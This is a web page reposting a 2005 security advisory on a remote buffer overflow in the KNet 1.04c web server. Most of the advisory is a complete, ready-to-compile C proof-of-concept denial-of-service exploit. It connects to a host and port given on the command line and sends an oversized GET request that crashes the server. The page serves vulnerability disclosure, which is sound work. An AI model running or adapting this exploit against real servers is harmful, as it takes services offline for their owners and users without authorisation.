首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Buffer Overflow in Knet
来源:www.x0n3-h4ck.org 作者:ders 发布时间:2005-03-08  

Buffer Overflow in Knet

Summary
KNet is "a small, functioning, web server that you can use to host a website from your very own hard drive".

A malicious attacker can send an arbitrarily long GET request that will cause the overwriting of the EIP register, which can in turn be used to execute malicious code.

Credit:
The information has been provided by CorryL.

Details
Vulnerable Systems:
* Knet 1.04c

Exploit:
/*
KNet <= 1.04c is affected to a remote buffer overflow in GET command.
This PoC demostrate the vulnerability.


KNet <= 1.04c PoC Denial Of Service Coded by: Expanders

Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>


*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);


int main(int argc, char *argv[]) {

struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc < 3 ) {
help(argv[0]);
exit(0);
}
printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
trg.sin_family = AF_INET;
trg.sin_port = htons(atoi(argv[2]));
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]\n\n[Finished] Check the server now\n");
}
else
printf("[Fail] -> Unable to connect\n\n");
close(sockfd);
return 0;

}

void help(char *program_name) {

printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
printf("\t-=[ ]=-\n");
printf("\t-=[ Coded by
ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
printf("Usage: %s <Host> <Port>\n",program_name);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RealPlayer SMIL File Handling
·paNews v2.0b4 Remote SQL Injec
·Microsoft Windows XP/2003 Remo
·Ethereal v0.10.9 RADIUS Auth.
·Computer Associates License So
·Internet Explorer CSS File Rem
·Forum-Aztek v4.0 myadmin.php R
·Ethereal 3G Remote Buffer Over
·CA License Server GETCONFIG Re
·SocialMPN Arbitrary File Injec
·CA License Client GETCONFIG Re
·Xpand Rally Format String Vuln
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved